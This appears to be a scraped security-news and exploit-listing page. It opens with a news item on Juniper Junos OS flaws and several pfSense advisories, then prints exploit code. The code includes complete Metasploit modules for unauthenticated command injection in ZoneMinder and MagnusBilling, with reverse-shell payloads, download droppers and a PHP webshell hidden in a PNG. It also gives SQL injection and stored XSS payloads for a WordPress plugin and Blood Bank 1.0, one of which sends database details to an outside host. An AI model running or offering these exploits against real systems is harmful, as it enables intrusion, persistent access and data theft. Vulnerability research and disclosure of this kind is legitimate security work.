The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has given a November 17, 2023, deadline for federal agencies and organizations to apply mitigations to secure against a number of security flaws in Juniper Junos OS that came to light in August.
The agency on Monday added five vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active

Cyber Attack / Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has given a November 17, 2023, deadline for federal agencies and organizations to apply mitigations to secure against a number of security flaws in Juniper Junos OS that came to light in August.

The agency on Monday added five vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation -

*   **CVE-2023-36844** (CVSS score: 5.3) - Juniper Junos OS EX Series PHP External Variable Modification Vulnerability
*   **CVE-2023-36845** (CVSS score: 5.3) - Juniper Junos OS EX Series and SRX Series PHP External Variable Modification Vulnerability
*   **CVE-2023-36846** (CVSS score: 5.3) - Juniper Junos OS SRX Series Missing Authentication for Critical Function Vulnerability
*   **CVE-2023-36847** (CVSS score: 5.3) - Juniper Junos OS EX Series Missing Authentication for Critical Function Vulnerability
*   **CVE-2023-36851** (CVSS score: 5.3) - Juniper Junos OS SRX Series Missing Authentication for Critical Function Vulnerability

The vulnerabilities, per Juniper, could be fashioned into an exploit chain to achieve remote code execution on unpatched devices. Also added to the list is CVE-2023-36851, which has been described as a variant of the SRX upload flaw.

Juniper, in an update to its advisory on November 8, 2023, said it's "now aware of successful exploitation of these vulnerabilities," recommending that customers update to the latest versions with immediate effect.

The details surrounding the nature of the exploitation are currently unknown.

In a separate alert, CISA has also warned that the Royal ransomware gang may rebrand as BlackSuit owing to the fact that the latter shares a "number of identified coding characteristics similar to Royal."

The development comes as Cyfirma disclosed that exploits for critical vulnerabilities are being offered for sale on darknet forums and Telegram channels.

"These vulnerabilities encompass elevation of privilege, authentication bypass, SQL injection, and remote code execution, posing significant security risks," the cybersecurity firm said, adding, "ransomware groups are actively searching for zero-day vulnerabilities in underground forums to compromise a large number of victims."

It also follows revelations from Huntress that threat actors are targeting multiple healthcare organizations by abusing the widely-used ScreenConnect remote access tool used by Transaction Data Systems, a pharmacy management software provider, for initial access.

"The threat actor proceeded to take several steps, including installing additional remote access tools such as ScreenConnect or AnyDesk instances, to ensure persistent access to the environments," Huntress noted.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

CISA Sets a Deadline - Patch Juniper Junos OS Flaws Before November 17

An issue in Netgate pfSense v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= pfSense-SA-23\_10.webgui Security Advisory pfSense Topic: Authenticated Command Execution in the WebGUI Category: pfSense Base System Module: webgui Announced: 2023-10-31 Credits: Oskar Zeino-Mahmalat (Sonar) CVE ID: CVE-2023-42326 Affects: pfSense Plus software versions <= 23.05.1 pfSense CE software versions <= 2.7.0 Corrected: 2023-07-05 19:31:30 UTC (pfSense Plus master, 23.09) 2023-07-05 19:31:30 UTC (pfSense CE master, 2.8.0) 0. Revision History v1.0 2023-10-31 Initial SA draft I. Background pfSense® software is a free network firewall distribution based on the FreeBSD operating system. The pfSense software distribution includes third- party free software packages for additional functionality, and provides most of the functionality of common commercial firewalls. pfSense® Plus is the productized version of pfSense software from Netgate®, previously referred to as pfSense Factory Edition (FE). It is available to Netgate appliance and CSP customers. The majority of users of pfSense software have never installed or used a stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions, there is no need for any UNIX knowledge. The command line is never used, and there is no need to ever manually edit any rule sets. Instead, pfSense software includes a web interface for the configuration of all included components. Users familiar with commercial firewalls will quickly understand the web interface, while those unfamiliar with commercial-grade firewalls may encounter a short learning curve. II. Problem Description A potential authenticated arbitrary command execution vulnerability was found in interfaces\_gif\_edit.php and interfaces\_gre\_edit.php, components of the pfSense Plus and pfSense CE software GUI. When creating or editing a GIF interface on interfaces\_gif\_edit.php or a GRE interface on interfaces\_gre\_edit.php, the submitted POST "gifif" or "greif" value is not validated. Subsequently, the value is passed to another function where the submitted value is used in shell commands. This problem is present on pfSense Plus version 23.05.1, pfSense CE version 2.7.0, and earlier versions of both. III. Impact Due to a lack of escaping on commands in the functions being called, it is possible to execute arbitrary commands with a properly formatted submission value for "gifif" or "greif" in POST operations. The user must be logged in and have sufficient privileges to access either interfaces\_gif\_edit.php or interfaces\_gre\_edit.php. IV. Workaround To help mitigate the problem on older releases, use one or more of the following: \* Limit access to the affected pages to trusted administrators only. \* Do not log into the firewall with the same browser used for non- administrative web browsing. V. Solution Users can upgrade to pfSense Plus software version 23.09 or later, or a pfSense CE software version after 2.7.0, when one is available. This upgrade may be performed in the web interface or from the console. See https://docs.netgate.com/pfsense/en/latest/install/upgrade-guide.html Users on pfSense Plus version 23.05.1 and pfSense CE version 2.7.0 may apply the fix from the recommended patches list in the System Patches package. Users may also manually apply the relevant revisions below using the System Patches package on earlier versions, or by manually making similar changes to the affected files if the patches do not apply directly. See https://docs.netgate.com/pfsense/en/latest/development/system-patches.html VI. Correction details The following list contains the correction revision commit ID for each affected item. Branch/path Revision - - ------------------------------------------------------------------------- plus/plus-master d69d6c8424ab4299234fb5ec6964682e2e6cbcdd pfSense/master d69d6c8424ab4299234fb5ec6964682e2e6cbcdd - - ------------------------------------------------------------------------- VII. References The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmU/wRgACgkQE7mH/ZIU +NpQWQ/+N55UGKjB+ZFEtXRV/d9Pl66TII2D28U8+v4iGNlcmo6jTC2mofYaQ77C dybvlyXM86lH1dDnzzv6uuEIjtSWyN0aM37ndfGDR7CxB5sgUXLkl+jeIdqZXqA2 IJgAdw59GCkeGttw9bCoIs7ZADlpx5/n37LMztxMHfgmw4KknEiBy1PF1YDIh4iD mwhqQLqDlhzcWOcqEAtECgpSoaIYd5Yd3/pNPtIsYhDg4QxSOCT6KGQuU/msTVru OmUE+qbjaFKu7oUKNdYtdpC4jgZ44SJLLNikLLyoxpcb/IqBOjqIDCXfq1Du8gJG 5QROPevZOfXbgFSKHF3zJlqcCFAVt4iAuazXFWjyHksU9jjMfxYvRvRxqqAJCXsF W3z3ib+sSjlooNSN/KOdQNQvmBlN1epWfhHWgNnoQQBS5S75nyomgbu/7Gbo+GWY y66zYDS1LtBKC+OjnypiUaI46IhqV3474dhPn13E5GqoeQxaT+YI5Zan8EZEVqkT 3TDTdjMfha9zXv/pEEHaoE9vZ+GDwtsNFxQN0CPTdAsyLpkpiKfjfBz1Vxo8UJyr t+iRNSg8VIe8n0jkd8ekb8GVbgY4WVeyVyz+qlGKPKmXdlVTt17vsMJu9jB/gmeU tl4ZZCrR5UVujekUqg0x1//UcdjTUkF7RMDU92k0whQftWOmaCA= =5TPU -----END PGP SIGNATURE-----

CVE-2023-42326

Cross Site Scripting (XSS) vulnerability in Netgate pfSense v.2.7.0 allows a remote attacker to gain privileges via a crafted url to the status_logs_filter_dynamic.php page.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= pfSense-SA-23\_09.webgui Security Advisory pfSense Topic: XSS vulnerability in the WebGUI Category: pfSense Base System Module: webgui Announced: 2023-10-31 Credits: Oskar Zeino-Mahmalat (Sonar) CVE ID: CVE-2023-42325 Affects: pfSense Plus software versions <= 23.05.1 pfSense CE software versions <= 2.7.0 Corrected: 2023-07-05 18:51:06 UTC (pfSense Plus master, 23.09) 2023-07-05 18:51:06 UTC (pfSense CE master, 2.8.0) 0. Revision History v1.0 2023-10-31 Initial SA draft I. Background pfSense® software is a free network firewall distribution based on the FreeBSD operating system. The pfSense software distribution includes third- party free software packages for additional functionality, and provides most of the functionality of common commercial firewalls. pfSense® Plus is the productized version of pfSense software from Netgate®, previously referred to as pfSense Factory Edition (FE). It is available to Netgate appliance and CSP customers. The majority of users of pfSense software have never installed or used a stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions, there is no need for any UNIX knowledge. The command line is never used, and there is no need to ever manually edit any rule sets. Instead, pfSense software includes a web interface for the configuration of all included components. Users familiar with commercial firewalls will quickly understand the web interface, while those unfamiliar with commercial-grade firewalls may encounter a short learning curve. II. Problem Description A potential Cross-Site Scripting (XSS) vulnerability was found in status\_logs\_filter\_dynamic.php, a component of the pfSense Plus and pfSense CE software GUI. The page does not always validate or sanitize the value of the "interface" variable from user input when using RAW mode ("filtersubmit=1"), which then may be printed without encoding inside a block of JavaScript code. This problem is present on pfSense Plus version 23.05.1, pfSense CE version 2.7.0, and earlier versions of both. III. Impact Due to the lack of proper encoding on the affected parameters susceptible to XSS, arbitrary JavaScript could be executed in the user's browser. The user's session cookie or other information from the session may be compromised. The user must be logged in and have sufficient privileges to access status\_logs\_filter\_dynamic.php. IV. Workaround To help mitigate the problem on older releases, use one or more of the following: \* Limit access to the affected pages to trusted administrators only. \* Do not log into the firewall with the same browser used for non- administrative web browsing. V. Solution Users can upgrade to pfSense Plus software version 23.09 or later, or a pfSense CE software version after 2.7.0, when one is available. This upgrade may be performed in the web interface or from the console. See https://docs.netgate.com/pfsense/en/latest/install/upgrade-guide.html Users on pfSense Plus version 23.05.1 and pfSense CE version 2.7.0 may apply the fix from the recommended patches list in the System Patches package. Users may also manually apply the relevant revisions below using the System Patches package on earlier versions, or by manually making similar changes to the affected files if the patches do not apply directly. See https://docs.netgate.com/pfsense/en/latest/development/system-patches.html VI. Correction details The following list contains the correction revision commit ID for each affected item. Branch/path Revision - - ------------------------------------------------------------------------- plus/plus-master f387c974a9a597bf01ab86ec049cca186a1e050c pfSense/master f387c974a9a597bf01ab86ec049cca186a1e050c - - ------------------------------------------------------------------------- VII. References The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmU/wRcACgkQE7mH/ZIU +NotvRAAobKxH11HjFKUNdAUA6rqv9BcRqgYWNVTVQSDM/Wmf4lw2mAvldMaaSOc KodEYJ6LWf1kZGu7VN36q59l7gn9/H42PeBNU7cNDJZaNXZd3LUG2bqRn4f8AuJA jUvPzE3w7DHcxrgHIn/3S8WI5WSVDgemzL4d6HlbzJtJ1mdF1viWkJZY6EqKRPgR Mw1adsPZyiAf7AalNRA7IJjPYTyUMxC2YSiMz2goeWd+6Zfkul9sbciTXCQwFAXO ZelZZm+arYtutXpeCJPmX3SvVcaT+f87anql20Xlijkuexr8aoMuSHOX8MYWMapY ndoNZZusoq2pUSK4VAPnhBIqtD6M7izC+bcWUBRea3h3/IiXjhPDtUtr4ONZQ3fQ HGf8ZEHd2EswpNhYbKz5cdMm37Q3JhRzVYMXFvNjsjOliF0ZyEibnO5L7W51Jujk yRu5fIli6UlfhcLD2iTOdnDnxSzxl4QiBAD0/XMVl3OQoy1R4AoFS9VtGi+EteB9 SykmgjmgIBjxSQvEyt30olt9XbVvDbi1EQDmJz6hd14P1Sy03BMn1BZoU5heN9Xc t3gdQMS01rB+EqGenXDnKvIKQ3LAb1AqNvYzn1BSrMno6YGCgSVEKw6vPEbEoI7r AX6MEZeetdwzHIEws9UEp8XYt6Q1hSmnNCJU8pfpAsuaum3SGo0= =W5mP -----END PGP SIGNATURE-----

CVE-2023-42325

Cross Site Scripting (XSS) vulnerability in Netgate pfSense v.2.7.0 allows a remote attacker to gain privileges via a crafted URL to the getserviceproviders.php page.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= pfSense-SA-23\_08.webgui Security Advisory pfSense Topic: XSS vulnerability in the WebGUI Category: pfSense Base System Module: webgui Announced: 2023-10-31 Credits: Oskar Zeino-Mahmalat (Sonar) CVE ID: CVE-2023-42327 Affects: pfSense Plus software versions <= 23.05.1 pfSense CE software versions <= 2.7.0 Corrected: 2023-07-05 17:43:56 UTC (pfSense Plus master, 23.09) 2023-07-05 17:43:56 UTC (pfSense CE master, 2.8.0) 0. Revision History v1.0 2023-10-31 Initial SA draft I. Background pfSense® software is a free network firewall distribution based on the FreeBSD operating system. The pfSense software distribution includes third- party free software packages for additional functionality, and provides most of the functionality of common commercial firewalls. pfSense® Plus is the productized version of pfSense software from Netgate®, previously referred to as pfSense Factory Edition (FE). It is available to Netgate appliance and CSP customers. The majority of users of pfSense software have never installed or used a stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions, there is no need for any UNIX knowledge. The command line is never used, and there is no need to ever manually edit any rule sets. Instead, pfSense software includes a web interface for the configuration of all included components. Users familiar with commercial firewalls will quickly understand the web interface, while those unfamiliar with commercial-grade firewalls may encounter a short learning curve. II. Problem Description A potential Cross-Site Scripting (XSS) vulnerability was found in getserviceproviders.php, a component of the pfSense Plus and pfSense CE software GUI. The page does not always validate or sanitize the value of the "connection" variable from user input, which then may be displayed without encoding. This problem is present on pfSense Plus version 23.05.1, pfSense CE version 2.7.0, and earlier versions of both. III. Impact Due to the lack of proper encoding on the affected parameters susceptible to XSS, arbitrary JavaScript could be executed in the user's browser. The user's session cookie or other information from the session may be compromised. The user must be logged in and have sufficient privileges to access getserviceproviders.php. The affected case requires a provider to only have one plan. IV. Workaround To help mitigate the problem on older releases, use one or more of the following: \* Limit access to the affected pages to trusted administrators only. \* Do not log into the firewall with the same browser used for non- administrative web browsing. V. Solution Users can upgrade to pfSense Plus software version 23.09 or later, or a pfSense CE software version after 2.7.0, when one is available. This upgrade may be performed in the web interface or from the console. See https://docs.netgate.com/pfsense/en/latest/install/upgrade-guide.html Users on pfSense Plus version 23.05.1 and pfSense CE version 2.7.0 may apply the fix from the recommended patches list in the System Patches package. Users may also manually apply the relevant revisions below using the System Patches package on earlier versions, or by manually making similar changes to the affected files if the patches do not apply directly. See https://docs.netgate.com/pfsense/en/latest/development/system-patches.html VI. Correction details The following list contains the correction revision commit ID for each affected item. Branch/path Revision - - ------------------------------------------------------------------------- plus/plus-master 543dc9253d6ab0e755ee043da2217d996a28ab5e pfSense/master 543dc9253d6ab0e755ee043da2217d996a28ab5e - - ------------------------------------------------------------------------- VII. References The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmU/wPoACgkQE7mH/ZIU +Nq8KA//YY1io7ZIDo//w4I3v+j25c83Yx40K20I+Zal8cyPflwqG6fF/DJRCEfv R0CWRZP6aPEfxVsWfLhoDktEm6yNcn0WR6MSVTbKOnyfJfb7Dp/tznkzZhSUqQ7v rt0bBMSdoQTn6gZIAD7TLVCmh9RfcYAXDWGiHUNC5d6kvy8Eoe7/+cjZUOSbvg/a EV0EgKqZoWFkwZWWLrbtNKyMBpIA1sgUKeVAPwnFMJ20QRPrafdNJircOU0S0vR5 1zAs6JMKgARL5ytzPxlndtKtwe1sVmxkYeGUb6C7b6mLnPckCFMGaAZYYnrK2V3f YbqK66/ZURgdmGcLAy305/oNwZy3JmpVS2FNgS3ZrBlwYXlYnxFkrEzi4SMFNtVP RltNabwM75bq/9tWqDm/nitHwmEgkm3wKdtXue2TGfNEulsmb+TeH7hGXJzuxStm 0lx+oQDmLL9jToPx4aHWMSXSCJe3wKk4uxpe6TTD9hnOB+TEln4sjmS5/MDlAYP8 zh8vkwKUag3gIPulsnmRFNrIPw49ezoWg4ZdVzadpw7zwS6Iar/oK4xEVIb6abWz kYAmB85iOuvqeZzVbiRNl8bb06h/ci9hXmsInuWwV8BfXtR1bl/xJ2n0j1AXnQPW yn27vmU9UmFodHjNfRATNzNGVL4vZoXDnvaeDMgRBwa5Dobslig= =9dZ6 -----END PGP SIGNATURE-----

CVE-2023-42327

This Metasploit module exploits an unauthenticated command injection in zoneminder that can be exploited by appending a command to an action of the snapshot view. Versions prior to 1.36.33 and 1.37.33 are affected.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework###class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Exploit::Remote::AutoCheck  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ZoneMinder Snapshots Command Injection',        'Description' => %q{          This module exploits an unauthenticated command injection          in zoneminder that can be exploited by appending a command          to the "create monitor ids[]"-action of the snapshot view.          Affected versions: < 1.36.33, < 1.37.33        },        'License' => MSF_LICENSE,        'Author' => [          'UnblvR',    # Discovery          'whotwagner' # Metasploit Module        ],        'References' => [          [ 'CVE', '2023-26035' ],          [ 'URL', 'https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr']        ],        'Privileged' => false,        'Platform' => ['linux', 'unix'],        'Targets' => [          [            'nix Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',                'FETCH_WRITABLE_DIR' => '/tmp'              }            }          ],          [            'Linux (Dropper)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64],              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },              'Type' => :linux_dropper            }          ],        ],        'CmdStagerFlavor' => [ 'bourne', 'curl', 'wget', 'printf', 'echo' ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-02-24',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The ZoneMinder path', '/zm/'])    ])  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'GET'    )    return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?    return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200    unless res.body.include?('ZoneMinder')      return Exploit::CheckCode::Safe('Target is not a ZoneMinder web server')    end    csrf_magic = get_csrf_magic(res)    # This check executes a sleep-command and checks the response-time    sleep_time = rand(5..10)    data = "view=snapshot&action=create&monitor_ids[0][Id]=0;sleep #{sleep_time}"    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic    res, elapsed_time = Rex::Stopwatch.elapsed_time do      send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'index.php'),        'method' => 'POST',        'data' => data.to_s,        'keep_cookies' => true      )    end    return Exploit::CheckCode::Unknown('Could not connect to the web service') unless res    print_status("Elapsed time: #{elapsed_time} seconds.")    if sleep_time < elapsed_time      return Exploit::CheckCode::Vulnerable    end    Exploit::CheckCode::Safe('Target is not vulnerable')  end  def execute_command(cmd, _opts = {})    command = Rex::Text.uri_encode(cmd)    print_status('Sending payload')    data = "view=snapshot&action=create&monitor_ids[0][Id]=;#{command}"    data += "&__csrf_magic=#{@csrf_magic}" if @csrf_magic    send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'POST',      'data' => data.to_s    )    print_good('Payload sent')  end  def exploit    # get magic csrf-token    print_status('Fetching CSRF Token')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'GET'    )    if res && res.code == 200      # parse token      @csrf_magic = get_csrf_magic(res)      unless @csrf_magic =~ /^key:[a-f0-9]{40},\d+/        fail_with(Failure::UnexpectedReply, 'Unable to parse token.')      end    else      fail_with(Failure::UnexpectedReply, 'Unable to fetch token.')    end    print_good("Got Token: #{@csrf_magic}")    # send payload    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  end  private  def get_csrf_magic(res)    return if res.nil?    res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text  endend

ZoneMinder Snapshots Command Injection

This Metasploit module exploits a command injection vulnerability in MagnusBilling application versions 6.x and 7.x that allows remote attackers to run arbitrary commands via an unauthenticated HTTP request. A piece of demonstration code is present in lib/icepay/icepay.php, with a call to an exec(). The parameter to exec() includes the GET parameter democ, which is controlled by the user and not properly sanitised/escaped. After successful exploitation, an unauthenticated user is able to execute arbitrary OS commands. The commands run with the privileges of the web server process, typically www-data or asterisk. At a minimum, this allows an attacker to compromise the billing system and its database.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/stopwatch'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  include Msf::Exploit::Format::PhpPayloadPng  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'MagnusBilling application unauthenticated Remote Command Execution.',        'Description' => %q{          A Command Injection vulnerability in MagnusBilling application 6.x and 7.x allows          remote attackers to run arbitrary commands via unauthenticated HTTP request.          A piece of demonstration code is present in `lib/icepay/icepay.php`, with a call to an exec().          The parameter to exec() includes the GET parameter `democ`, which is controlled by the user and          not properly sanitised/escaped.          After successful exploitation, an unauthenticated user is able to execute arbitrary OS commands.          The commands run with the privileges of the web server process, typically `www-data` or `asterisk`.          At a minimum, this allows an attacker to compromise the billing system and its database.          The following MagnusBilling applications are vulnerable:          - MagnusBilling application version 6 (all versions);          - MagnusBilling application up to version 7.x without commit 7af21ed620 which fixes this vulnerability;        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'Eldstal' # Discovery of the vulnerability        ],        'References' => [          ['CVE', '2023-30258'],          ['URL', 'https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258'],          ['URL', 'https://eldstal.se/advisories/230327-magnusbilling.html']        ],        'DisclosureDate' => '2023-06-26',        'Platform' => ['php', 'unix', 'linux'],        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],        'Privileged' => true,        'Targets' => [          [            'PHP',            {              'Platform' => ['php'],              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => ['linux'],              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],              'Linemax' => 2048,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [ true, 'The MagnusBilling endpoint URL', '/mbilling' ]),      OptString.new('WEBSHELL', [        false, 'The name of the webshell with extension. Webshell name will be randomly generated if left unset.', nil      ], conditions: %w[TARGET == 0])    ])  end  def execute_command(cmd, _opts = {})    return send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'lib', 'icepay', 'icepay.php'),      'vars_get' =>        {          'democ' => "/dev/null;#{cmd};#"        }    })  end  def execute_php(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'lib', 'icepay', @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        @post_param => payload      }    })  end  def upload_webshell    # randomize file name if option WEBSHELL is not set    @webshell_name = if datastore['WEBSHELL'].blank?                       "#{Rex::Text.rand_text_alpha(8..16)}.php"                     else                       datastore['WEBSHELL'].to_s                     end    @post_param = Rex::Text.rand_text_alphanumeric(1..8)    # inject PHP payload into the PLTE chunk of a PNG image to hide the payload    php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"    png_webshell = inject_php_payload_png(php_payload, injection_method: 'PLTE')    return nil if png_webshell.nil?    # encode webshell data, set write and execute permissions and write to file on the target for execution    payload = Base64.strict_encode64(png_webshell.to_s)    cmd = "chmod 755 ./;echo #{payload}|base64 -d > ./#{@webshell_name}"    execute_command(cmd)  end  def check    print_status("Checking if #{peer} can be exploited.")    res = send_request_cgi!({      'method' => 'GET',      'ctype' => 'application/x-www-form-urlencoded',      'uri' => normalize_uri(target_uri.path)    })    # Check if target is a magnusbilling application    return CheckCode::Unknown('No response received from target.') unless res    return CheckCode::Safe('Likely not a magnusbilling application.') unless res.code == 200 && res.body =~ /MagnusBilling/i    # blind command injection using sleep command    sleep_time = rand(4..8)    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")    _res, elapsed_time = Rex::Stopwatch.elapsed_time do      execute_command("sleep #{sleep_time}")    end    print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")    return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time    CheckCode::Vulnerable('Successfully tested command injection.')  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :php      res = upload_webshell      fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200      register_file_for_cleanup(@webshell_name.to_s)      execute_php(payload.encoded)    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager({ linemax: target.opts['Linemax'] })    end  endend

MagnusBilling Remote Command Execution

WordPress Contact Form to Any API plugin version 1.1.2 suffers from a remote SQL injection vulnerability.

    # Exploit Title: WP Plugins Contact Form to Any API <= 1.1.2 - SQL Injection# Date: 12-11-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/# Vendor Homepage: https://www.itpathsolutions.com/# Version: 1.1.2 # Tested on: Windows, Linux# CVE: CVE-2023-32741# Product DescriptionContact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.# Vulnerability overviewThe Wordpress plugins Contact Form to Any API <= 1.1.2 is vulnerable to Blind SQL Injection (time-based) via the form_id parameter on the /wp-admin/edit.php endpoint. This vulnerability could lead to unauthorized data access and modification.# Proof of ConceptAffected Endpoint: /wp-admin/edit.php?post_type=cf7_to_any_api&page=cf7anyapi_entries&form_id=Affected Parameter: form_idpayload: 1 UNION SELECT NULL,NULL,NULL,NULL,NULL,SLEEP(5)-- -# RecommendationUpgrade to version 1.1.3

WordPress Contact Form To Any API 1.1.2 SQL Injection

Cross Site Scripting (XSS) in updateprofile.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'rename', 'remail', 'rphone' and 'rcity' parameters.

**CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability**

*   Exploit Author: ersinerenler

**Vendor Homepage**

*   https://code-projects.org/blood-bank-in-php-with-source-code

**Software Link**

*   https://download-media.code-projects.org/2020/11/Blood\_Bank\_In\_PHP\_With\_Source\_code.zip

**Overview**

*   Code-Projects Blood Bank V1.0 is susceptible to a critical security vulnerability involving Stored Cross-Site Scripting (XSS) through multiple parameters (rename, remail, rphone, and rcity) in the /updateprofile.php file. The application fails to adequately sanitize user-supplied data, allowing attackers to inject malicious scripts into the application. This could lead to the execution of arbitrary script code in the browsers of unsuspecting users, potentially compromising their security and privacy within the context of the affected site.

**Vulnerability Details**

*   CVE ID: CVE-2023-46020
*   Affected Version: Blood Bank V1.0
*   Vulnerable File: updateprofile.php
*   Parameters: rename, remail, rphone, rcity
*   Attack Type: local

**Description**

*   The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.

**Proof of Concept (PoC) :**

*   Intercept the POST request to updateprofile.php via Burp Suite
*   Inject the payload to the vulnerable parameters
*   Payload: "><svg/onload=alert(document.domain)>
*   Example request for rname parameter

    POST /bloodbank/file/updateprofile.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 103
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/bloodbank/rprofile.php?id=1
    Cookie: PHPSESSID=<some-cookie-value>
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update
    

*   Go to the profile page and trigger the XSS

CVE-2023-46020: GitHub - ersinerenler/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability

SQL Injection vulnerability in cancel.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary commands via the 'reqid' parameter.

    ---
    GET /bloodbank/file/cancel.php?reqid=4'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.7mus27hip62tznk3gy4n7z3fo6uxin6c.oastify.com\\a.txt')))%2b' HTTP/1.1
    Host: localhost
